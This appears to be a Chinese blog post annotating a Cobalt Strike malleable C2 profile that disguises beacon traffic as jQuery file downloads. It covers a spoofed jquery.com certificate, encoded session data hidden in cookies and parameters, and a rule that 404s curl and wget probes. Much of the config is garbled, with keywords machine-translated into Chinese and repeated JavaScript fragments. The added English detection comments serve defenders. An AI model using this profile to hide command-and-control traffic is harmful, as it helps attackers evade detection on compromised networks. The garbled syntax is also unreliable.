profile


这个玩意里面有很多cs特征,改掉能方便点,没用的注意事项基本都删掉


[HTML]set example_name "jQuery CS 4.5 Profile";[/HTML]

设置全局选项 sample_name(上面代码里写成了 example_name,选项名应为 sample_name),值就是这个 profile 的名称,一般和文件名保持一致


[HTML]set sleeptime "45000" ; # 45秒[/HTML]

设置心跳包时间(回连间隔),单位是毫秒,45000 即 45 秒


[HTML]set jitter "37";[/HTML]

设置随机延迟(jitter),取值是百分比:每次心跳间隔在 sleeptime 的基础上按这个比例随机浮动,这里是 37%


[HTML]set data_jitter "100";[/HTML]

在服务端 http-get / http-post 的响应后面追加一段随机长度的数据,长度上限就是这里设置的 100 字节


[HTML]set useragent "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv :11.0) like Gecko";[/HTML]

设置UA头


[HTML]https-certificate {
# Certificate settings for the HTTPS listener. The comments list three ways to supply a certificate;
# options 1 and 2 are left commented out, and the uncommented lines sit under option 3.
# NOTE(review): both the self-signed subject fields and a keystore/password pair are set below;
# which of the two takes effect is not visible in this listing - confirm.

## Option 1) Trusted, signed certificate
## Use keytool to create a Java keystore file.
## See https://www.cobaltstrike.com/help-malleable-c2#validssl
## or https://github.com/killswitch-GUI/CobaltStrike-ToolKit/blob/master/HTTPsC2DoneRight.sh

## Option 2) Create your own self-signed certificate
## Use keytool to import your own self-signed certificate

#set keystore "/pathtokeystore";
#set password "password";

## Option 3) Cobalt Strike self-signed certificate
# Detection note: the subject fields name jquery.com / jQuery. If the self-signed option is the one in
# effect, the certificate does not chain to a publicly trusted CA, so a TLS certificate that claims
# jquery.com without a trusted issuer is a mismatch worth alerting on.
set C "US "; # country
set CN "jquery.com";
set O "jQuery";
set OU "Certificate Authority";
set validity "365";

set keystore "cobalstrike.store"; # keystore file
set password "666666"; # keystore password
}
[/HTML]

https-certificate ssl 证书配置


[HTML]http-config {
# Global response-header settings; the page describes them as applying to both HTTP and HTTPS responses.
# NOTE(review): the three non-ASCII statements below appear to have been altered by machine translation
# (keywords and quote characters), and no closing brace for this block is visible in the listing - confirm
# against the author's original file before relying on this text.
set headers "Date, Server, Content-Length, Keep-Alive, Connection, Content-Type";
标头“服务器”“Apache”;
标题“保持活动”“超时= 10,最大值= 100”;
标头“连接”“保持活动”;
# Use this option if your team server sits behind a redirector
set trust_x_forwarded_for "true";
# Block specific user agents with a 404 (added in 4.3)
# Detection note: requests whose User-Agent matches one of these patterns are answered with a 404,
# so a 404 returned to a curl/wget probe does not show that the URI is unserved.
set block_useragents "curl*,lynx*,wget*";[/HTML]

http-config,包括http和https的全局响应头配置


[HTML]http-get {
# 下发命令访问的uri
set uri "/jquery-3.3.1.min.js";
# 请求方法
set verb "GET";
#客户端配置
client {
# Shape of the request sent for the http-get transaction: a fixed set of browser-like headers plus
# the metadata block that says how the session metadata is encoded and where it is placed.

header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
#header "Host" "code.jquery.com";
标头“Referer”“http://code.jquery.com/”;
标头“Accept-Encoding”“gzip,deflate”;
# Metadata configuration
# NOTE(review): the non-ASCII statements in this block look machine-translated. Read literally they say:
# base64url-encode the metadata, prepend "__cfduid=", and carry the result in the Cookie header - confirm
# against the author's original file.
# Detection note: a Cookie header whose "__cfduid=" value is a long base64url string, sent together with
# the static Accept / Referer / Accept-Encoding values above, is a stable pattern to match on.
metadata {
base64url;
前面加上“__cfduid=”;
标头“Cookie”;
}
}
# 服务端配置
server {
# 响应头设置
header "Server" "NetDNA-cache/2.2";
标头“缓存控制”“最大年龄=0,no-cache";
header "Pragma" "no-cache";
header "Connection" "keep-alive";
header "Content-Type" "application/javascript; charset=utf-8";
# # 输出信息
output {
mask;
base64url;
## javascript 已更改。双引号和反斜杠已转义,以便正确呈现(请参阅配置文件参数值的提示)
# 第二行
在前面添加“!function(e,t){\“使用严格\”; \“对象\”==模块类型&&\“对象\”==模块类型.exports?module.exports= e.document?t(e,!0):f unction(e){如果(!e.document)抛出新错误(\“jQuery 需要带有文档的窗口\”);返回 t(e)}:t(e)}(\“未定义\”!=窗口类型?窗口:this,function(e,t){\“ 使用严格\”; var n = [],r = e.document,i = Object.getPrototypeOf,o = n.slice,a = n.concat,s = n.push,u = n.indexOf,l = {},c = l.toString,f = l.hasOwnProperty,p = f.toString,d = p.call(Object),h = {},g = function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule: !0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e ,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)} function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?l[c.call(e)]||"object":typeof e}var b="3.3.1",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:"3.3.1",constructor:w ,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:fun ction(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n .sort,splice:n.splice},w.extend=w.fn.extend=functi on(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"== typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray( r) 
))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:"jQuery"+("3.3.1"+Math.ra ndom()).replace(/\\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function (e){var t,n;return!(!e||"[object Object]"!==c.call(e))&&(!(t=i(e))||"function"==type of( n=f.call(t,"构造函数")&&t.constructor)&&p.cal l(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)}, each:function(e,t){var n,r=0;如果(C(e)){for(n=e.length;r<n;r++)如果(!1===t.ca ll(e[r],r,e[r]))break}else for(r in e)如果(!1===t.call(e[r],r,e[r]))break;返回 e},trim:function(e){返回 null==e?"":(e+"").replace(T,"")},makeArray:f unction(e,t){var n=t||[];返回 null!=e&&(C(Object(e))?w.merge(n,"string"==typeo fe?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){返回null ==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),"function"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each("布尔数字字符串函数数组日期RegExp对象错误符号".split(" "),function(e,t){l["[object "+t+"]"]=t.toLowerCase()});function C(e){var t=!!e&&"length"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&("array\ "= ==n||0===t||"number"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b="sizzle" +1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=f unction(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e, t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P="\r";y(e)&&("array"= ==n||0===t||"number"==typeof t&&t>0&&t-1 in e)}var E=function(e){var 
t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b="sizzle" +1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=f unction(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e, t){for(var n=0,r=e.length;n<r;n++)如果(e[n]===t)返回 n;返回-1},P="\r";y(e)&&("array"= ==n||0===t||"number"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b="sizzle" +1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=f unction(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e, t){for(var n=0,r=e.length;n<r;n++)如果(e[n]===t)返回 n;返回-1},P="\r";
# 第一行
前面添加“/*!jQuery v3.3.1 | (c) JS Foundation and other contributes | jquery.org/license */”;
附加“\”。(o=t.documentElement,Math.max(t.body[\“scroll\”+e],o[\“scroll\”+e],t.body[\“offset\”+e],o[\“offset\”+e],o[\“client\”+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\“模糊焦点focusin focusout调整大小滚动点击dblclick鼠标按下鼠标向上鼠标移动鼠标悬停鼠标移出鼠标进入鼠标 离开更改选择提交键盘按下键盘键盘向上上下文菜单\”。split(\“\”),function(e,t ){w.fn [t] = function(e,n){返回参数。长度> 0?this.on(t,null,e,n):this.trigge r(t)}}),w.fn.extend({hover:function(e,t){返回 this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend ({bind:function(e,t,n){返回 this.on(e,null,t,n)},unbind:function(e,t){返回 this.off(e,null,t)},delegate:function(e,t,n,r){返回 this.on(t,e,n,r)},undelegate:function(e,t,n){返回 1===arguments.length?this.off(e,"**"):this.off(t ,e||"**",n)}}),w.proxy=function(e,t){var n,r,i;if("string"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.gu id=e.guid=e.guid||w.guid++,i},w.holdReady=function (e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.i sArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFun ction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now= Date.now,w.isNumeric=function(e){var t=w.type(e);return("number"===t||"string"===t) &&!isNaN(e-parseFloat(e))},"function"==typeof Define&&define.amd&&define("jquery",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w },t||(e.jQuery=e.$=w),w});";
print;
}
}
}[/HTML]

http-get:由受害主机上的 Beacon 向服务器端(team server)发起 GET 请求来取任务,方向是受害主机到服务器,而不是服务器主动去请求受害者;client 块定义这个请求的样子,server 块定义服务器返回的响应


[HTML]http-post {

set uri “/jquery-3.3.2.min.js”;
设置动词“POST”;

客户端 {
# Shape of the request sent for the http-post transaction: the same browser-like headers as the
# http-get request, an id block and an output block.
# NOTE(review): every keyword and quote character in this block appears to have been altered by machine
# translation; the readings given in the comments below are literal translations - confirm against the
# author's original file.

标头“Accept” “text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8”;
#header“Host” “code.jquery.com”;
标头“Referer” “http://code.jquery.com/”;
标头“Accept-Encoding” “gzip, deflate”;

# id block, read literally: mask, then base64url-encode, then carry the value in a request parameter
# named "__cfduid".
# Detection note: a POST whose "__cfduid" parameter holds a base64url string rather than a short
# cookie-style token is a pattern to match on.
id {
掩码;
base64url;
参数“__cfduid”;
}

# output block, read literally: mask, then base64url-encode, then print, which would place the encoded
# data in the request body - presumably the task output; confirm.
输出 {
掩码;
base64url;
打印;
}
}

服务器 {

标头“Server” “NetDNA-cache/2.2”;
标头“Cache-Control” “max-age=0,no-cache";
header "Pragma" "no-cache";
header "Connection" "keep-alive";
header "Content-Type" "application/javascript; charset=utf-8";

output {
mask;
base64url;
## javascript 已更改。双引号和反斜杠已转义以正确呈现(请参阅配置文件参数值的提示)
# 第二行
在前面添加“!function(e,t){\“使用严格\”; \“对象\”==模块类型&&\“对象\”==模块类型.exports?module.exports= e.document?t(e,!0):f unction(e){如果(!e.document)抛出新错误(\“jQuery 需要带有文档的窗口\”);返回 t(e)}:t(e)}(\“未定义\”!=窗口类型?窗口:this,function(e,t){\“ 使用严格\”; var n = [],r = e.document,i = Object.getPrototypeOf,o = n.slice,a = n.concat,s = n.push,u = n.indexOf,l = {},c = l.toString,f = l.hasOwnProperty,p = f.toString,d = p.call(Object),h = {},g = function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule: !0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e ,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)} function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?l[c.call(e)]||"object":typeof e}var b="3.3.1",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:"3.3.1",constructor:w ,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:fun ction(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n .sort,splice:n.splice},w.extend=w.fn.extend=functi on(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"== typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray( r) 
))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:"jQuery"+("3.3.1"+Math.ra ndom()).replace(/\\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function (e){var t,n;return!(!e||"[object Object]"!==c.call(e))&&(!(t=i(e))||"function"==type of( n=f.call(t,"构造函数")&&t.constructor)&&p.cal l(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)}, each:function(e,t){var n,r=0;如果(C(e)){for(n=e.length;r<n;r++)如果(!1===t.ca ll(e[r],r,e[r]))break}else for(r in e)如果(!1===t.call(e[r],r,e[r]))break;返回 e},trim:function(e){返回 null==e?"":(e+"").replace(T,"")},makeArray:f unction(e,t){var n=t||[];返回 null!=e&&(C(Object(e))?w.merge(n,"string"==typeo fe?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){返回null ==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),"function"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each("布尔数字字符串函数数组日期RegExp对象错误符号".split(" "),function(e,t){l["[object "+t+"]"]=t.toLowerCase()});function C(e){var t=!!e&&"length"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&("array\ "= ==n||0===t||"number"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b="sizzle" +1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=f unction(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e, t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P="\r";y(e)&&("array"= ==n||0===t||"number"==typeof t&&t>0&&t-1 in e)}var E=function(e){var 
t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b="sizzle" +1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=f unction(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e, t){for(var n=0,r=e.length;n<r;n++)如果(e[n]===t)返回 n;返回-1},P="\r";y(e)&&("array"= ==n||0===t||"number"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b="sizzle" +1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=f unction(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e, t){for(var n=0,r=e.length;n<r;n++)如果(e[n]===t)返回 n;返回-1},P="\r";
# 第一行
前面添加“/*!jQuery v3.3.1 | (c) JS Foundation and other contributes | jquery.org/license */”;
附加“\”。(o=t.documentElement,Math.max(t.body[\“scroll\”+e],o[\“scroll\”+e],t.body[\“offset\”+e],o[\“offset\”+e],o[\“client\”+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\“模糊焦点focusin focusout调整大小滚动点击dblclick鼠标按下鼠标向上鼠标移动鼠标悬停鼠标移出鼠标进入鼠标 离开更改选择提交键盘按下键盘键盘向上上下文菜单\”。split(\“\”),function(e,t ){w.fn [t] = function(e,n){返回参数。长度> 0?this.on(t,null,e,n):this.trigge r(t)}}),w.fn.extend({hover:function(e,t){返回 this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend ({bind:function(e,t,n){返回 this.on(e,null,t,n)},unbind:function(e,t){返回 this.off(e,null,t)},delegate:function(e,t,n,r){返回 this.on(t,e,n,r)},undelegate:function(e,t,n){返回 1===arguments.length?this.off(e,"**"):this.off(t ,e||"**",n)}}),w.proxy=function(e,t){var n,r,i;if("string"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.gu id=e.guid=e.guid||w.guid++,i},w.holdReady=function (e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.i sArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFun ction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now= Date.now,w.isNumeric=function(e){var t=w.type(e);return("number"===t||"string"===t) &&!isNaN(e-parseFloat(e))},"function"==typeof define&&define.amd&&define("jquery",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w },t||(e.jQuery=e.$=w),w});";
print;
}
}
}[/HTML]

http-post:Beacon 执行完任务之后,向服务器端发送一个 POST 请求把结果传回去;client 块里的 id 携带会话标识,output 携带任务输出,server 块定义服务器对这个 POST 的响应